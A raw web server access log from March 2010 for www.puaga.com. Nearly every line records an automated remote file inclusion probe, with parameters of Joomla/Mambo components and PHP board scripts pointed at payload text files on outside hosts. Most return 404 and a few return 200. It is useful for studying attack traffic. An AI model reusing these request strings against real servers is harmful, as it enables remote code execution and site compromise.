219.94.194.248 - - [05/Mar/2010:10:55:46 -0800] "GET /logs//zboard/include/write.php?dir=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [05/Mar/2010:10:55:46 -0800] "GET /zboard/include/write.php?dir=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [05/Mar/2010:10:55:46 -0800] "GET /logs/access_100131.log//zboard/include/write.php?dir=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [05/Mar/2010:10:55:54 -0800] "GET /logs/access_100213.log//zboard/include/write.php?dir=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
99.57.90.154 - - [05/Mar/2010:10:58:05 -0800] "GET /logs/access_100203.log//bbs/delete.php?board_skin_path=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
99.57.90.154 - - [05/Mar/2010:10:58:05 -0800] "GET /logs/access_100206.log//bbs/delete.php?board_skin_path=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.49.100.254 - - [05/Mar/2010:10:59:36 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.49.100.254 - - [05/Mar/2010:10:59:36 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.49.100.254 - - [05/Mar/2010:10:59:37 -0800] "GET /logs/access_100204.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
190.152.217.250 - - [05/Mar/2010:11:01:17 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://golgc.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
190.152.217.250 - - [05/Mar/2010:11:01:17 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://golgc.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
190.152.217.250 - - [05/Mar/2010:11:01:17 -0800] "GET /logs/access_100129.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://golgc.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.24.9.88 - - [05/Mar/2010:11:02:24 -0800] "GET /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.24.9.88 - - [05/Mar/2010:11:02:24 -0800] "GET /logs/access_100213.log%20%20/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.24.9.88 - - [05/Mar/2010:11:02:24 -0800] "GET /logs/access_100207.log%20%20/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.24.9.88 - - [05/Mar/2010:11:02:24 -0800] "GET /logs/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:11:03:50 -0800] "GET /skin/zero_vote/error.php?dir=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:11:03:50 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:11:03:50 -0800] "GET /logs/access_100214.log%20%20//skin/zero_vote/error.php?dir=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:11:03:50 -0800] "GET /logs/access_100205.log%20%20//skin/zero_vote/error.php?dir=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.24.9.88 - - [05/Mar/2010:11:04:10 -0800] "GET /logs/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.24.9.88 - - [05/Mar/2010:11:04:10 -0800] "GET /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.24.9.88 - - [05/Mar/2010:11:04:10 -0800] "GET /logs/access_100207.log%20%20/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.24.9.88 - - [05/Mar/2010:11:04:15 -0800] "GET /logs/access_100213.log%20%20/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.24.9.88 - - [05/Mar/2010:11:05:18 -0800] "GET /logs/access_100129.log%20%20/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:11:06:15 -0800] "GET /logs/access_100207.log%20%20/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:11:06:15 -0800] "GET /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:11:06:15 -0800] "GET /logs/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:11:06:19 -0800] "GET /logs/access_100207.log%20%20/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:11:06:19 -0800] "GET /logs/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:11:06:19 -0800] "GET /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:11:06:20 -0800] "GET /logs/access_100213.log%20%20/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:11:06:24 -0800] "GET /logs/access_100213.log%20%20/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [05/Mar/2010:11:06:44 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [05/Mar/2010:11:06:44 -0800] "GET /logs/include/admin.lib.inc.php?site_path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [05/Mar/2010:11:06:44 -0800] "GET /logs/access_100226.log%20%20/include/admin.lib.inc.php?site_path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.49.100.254 - - [05/Mar/2010:11:06:49 -0800] "GET /logs/access_100204.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [05/Mar/2010:11:06:55 -0800] "GET /logs/access_100211.log%20%20///?sayfa=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [05/Mar/2010:11:06:55 -0800] "GET /logs///?sayfa=http://www.buddwriter.org/board/sc1? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [05/Mar/2010:11:06:55 -0800] "GET //?sayfa=http://www.buddwriter.org/board/sc1? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
190.152.217.250 - - [05/Mar/2010:11:07:16 -0800] "GET /logs/access_100129.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://golgc.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [05/Mar/2010:11:07:17 -0800] "GET /logs/access_100129.log%20%20///?sayfa=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.88.23.5 - - [05/Mar/2010:11:07:19 -0800] "HEAD /sitemap.xml HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "puaga.com"
94.124.120.61 - - [05/Mar/2010:11:07:38 -0800] "GET /logs/access_100211.log%20%20///?sayfa=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.124.120.61 - - [05/Mar/2010:11:07:38 -0800] "GET /logs///?sayfa=http://www.buddwriter.org/board/sc1? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
94.124.120.61 - - [05/Mar/2010:11:07:38 -0800] "GET //?sayfa=http://www.buddwriter.org/board/sc1? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.157.211.204 - - [05/Mar/2010:11:07:41 -0800] "GET /logs/include/admin.lib.inc.php?site_path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.157.211.204 - - [05/Mar/2010:11:07:41 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.157.211.204 - - [05/Mar/2010:11:07:41 -0800] "GET /logs/access_100303.log/include/admin.lib.inc.php?site_path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [05/Mar/2010:11:07:45 -0800] "GET /logs/access_100128.log%20%20///?sayfa=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:11:07:58 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:11:07:58 -0800] "GET /logs/include/admin.lib.inc.php?site_path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:11:07:58 -0800] "GET /logs/access_100226.log%20%20/include/admin.lib.inc.php?site_path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.124.120.61 - - [05/Mar/2010:11:08:05 -0800] "GET /logs/access_100129.log%20%20///?sayfa=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.124.120.61 - - [05/Mar/2010:11:08:11 -0800] "GET /logs/access_100128.log%20%20///?sayfa=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [05/Mar/2010:11:08:35 -0800] "GET /logs/access_100209.log%20%20///?sayfa=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:11:08:45 -0800] "GET /logs/access_100209.log/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:11:08:45 -0800] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:11:08:45 -0800] "GET /logs/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.124.120.61 - - [05/Mar/2010:11:08:56 -0800] "GET /logs/access_100209.log%20%20///?sayfa=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:11:09:03 -0800] "GET /logs/access_100209.log/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:11:09:03 -0800] "GET /logs/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:11:09:05 -0800] "GET /logs/access_100224.log%20%20/include/admin.lib.inc.php?site_path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:11:09:06 -0800] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
190.152.217.250 - - [05/Mar/2010:11:09:15 -0800] "GET /logs/access_100208.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://golgc.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:11:09:23 -0800] "GET /logs/access_100203.log/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:11:09:29 -0800] "GET /logs/access_100209.log/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:11:09:30 -0800] "GET /logs/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:11:09:30 -0800] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:11:09:42 -0800] "GET /logs/access_100203.log/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:11:09:50 -0800] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:11:09:50 -0800] "GET /logs/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:11:09:52 -0800] "GET /logs/access_100209.log/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:11:09:55 -0800] "GET /logs/access_100203.log/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:11:10:20 -0800] "GET /logs/access_100203.log/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [05/Mar/2010:11:10:26 -0800] "GET /logs/access_100224.log%20%20/include/admin.lib.inc.php?site_path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
190.152.217.250 - - [05/Mar/2010:11:10:44 -0800] "GET /logs/access_100208.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://golgc.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.124.120.61 - - [05/Mar/2010:11:11:16 -0800] "GET /logs/access_100215.log%20%20///?sayfa=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [05/Mar/2010:11:11:31 -0800] "GET /logs/access_100215.log%20%20///?sayfa=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:11:11:32 -0800] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:11:11:34 -0800] "GET /logs/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:11:11:37 -0800] "GET /logs/access_100209.log%20%20/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:11:11:38 -0800] "GET /logs/access_100203.log%20%20/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [05/Mar/2010:11:12:34 -0800] "GET /logs/include/admin.lib.inc.php?site_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [05/Mar/2010:11:12:34 -0800] "GET /logs/access_100226.log%20%20/include/admin.lib.inc.php?site_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [05/Mar/2010:11:12:34 -0800] "GET /include/admin.lib.inc.php?site_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.157.211.204 - - [05/Mar/2010:11:12:42 -0800] "GET /logs/include/admin.lib.inc.php?site_path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.157.211.204 - - [05/Mar/2010:11:12:42 -0800] "GET /logs/access_100226.log%20%20/include/admin.lib.inc.php?site_path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.157.211.204 - - [05/Mar/2010:11:12:42 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.124.120.61 - - [05/Mar/2010:11:13:12 -0800] "GET /logs/access_100211.log///?sayfa=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.124.120.61 - - [05/Mar/2010:11:13:21 -0800] "GET /logs/access_100129.log///?sayfa=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [05/Mar/2010:11:13:29 -0800] "GET /logs/access_100211.log///?sayfa=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.157.211.204 - - [05/Mar/2010:11:13:34 -0800] "GET /logs/access_100224.log%20%20/include/admin.lib.inc.php?site_path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [05/Mar/2010:11:13:40 -0800] "GET /logs/access_100129.log///?sayfa=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.49.100.254 - - [05/Mar/2010:11:14:33 -0800] "GET /logs/access_100126.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
63.223.85.28 - - [05/Mar/2010:11:16:22 -0800] "GET ///delete_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
63.223.85.28 - - [05/Mar/2010:11:16:22 -0800] "GET /logs////delete_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [05/Mar/2010:11:16:27 -0800] "GET /logs/access_100215.log%20%20/include/admin.lib.inc.php?site_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
63.223.85.28 - - [05/Mar/2010:11:16:32 -0800] "GET /logs//////delete_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
63.223.85.28 - - [05/Mar/2010:11:16:32 -0800] "GET /logs/access_100203.log%20%20//////delete_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
63.223.85.28 - - [05/Mar/2010:11:16:34 -0800] "GET /logs/access_100206.log%20%20////delete_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
63.223.85.28 - - [05/Mar/2010:11:16:34 -0800] "GET /////delete_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
41.204.218.244 - - [05/Mar/2010:11:16:45 -0800] "GET /phplive/setup/header.php?css_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
41.204.218.244 - - [05/Mar/2010:11:16:45 -0800] "GET /logs/access_100204.log//phplive/setup/header.php?css_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
41.204.218.244 - - [05/Mar/2010:11:16:45 -0800] "GET /logs//phplive/setup/header.php?css_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
63.223.85.28 - - [05/Mar/2010:11:16:45 -0800] "GET /logs/access_100206.log%20%20//////delete_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
190.152.217.250 - - [05/Mar/2010:11:18:22 -0800] "GET /logs/access_100208.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://golgc.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
63.223.85.28 - - [05/Mar/2010:11:18:24 -0800] "GET /logs/access_100203.log//////delete_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
63.223.85.28 - - [05/Mar/2010:11:18:24 -0800] "GET /logs/access_100206.log//////delete_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
63.223.85.28 - - [05/Mar/2010:11:18:24 -0800] "GET /////delete_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
63.223.85.28 - - [05/Mar/2010:11:18:24 -0800] "GET /logs//////delete_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
41.204.218.244 - - [05/Mar/2010:11:18:39 -0800] "GET /logs/access_100204.log%20%20//phplive/setup/header.php?css_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
63.223.85.28 - - [05/Mar/2010:11:19:45 -0800] "GET /////delete_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
63.223.85.28 - - [05/Mar/2010:11:19:57 -0800] "GET /logs/access_100206.log%20%20//////delete_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.141.1.200 - - [05/Mar/2010:11:19:59 -0800] "GET /include/admin.lib.inc.php?site_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.141.1.200 - - [05/Mar/2010:11:19:59 -0800] "GET /logs/include/admin.lib.inc.php?site_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.141.1.200 - - [05/Mar/2010:11:19:59 -0800] "GET /logs/access_100226.log%20%20/include/admin.lib.inc.php?site_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
63.223.85.28 - - [05/Mar/2010:11:20:05 -0800] "GET ///delete_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
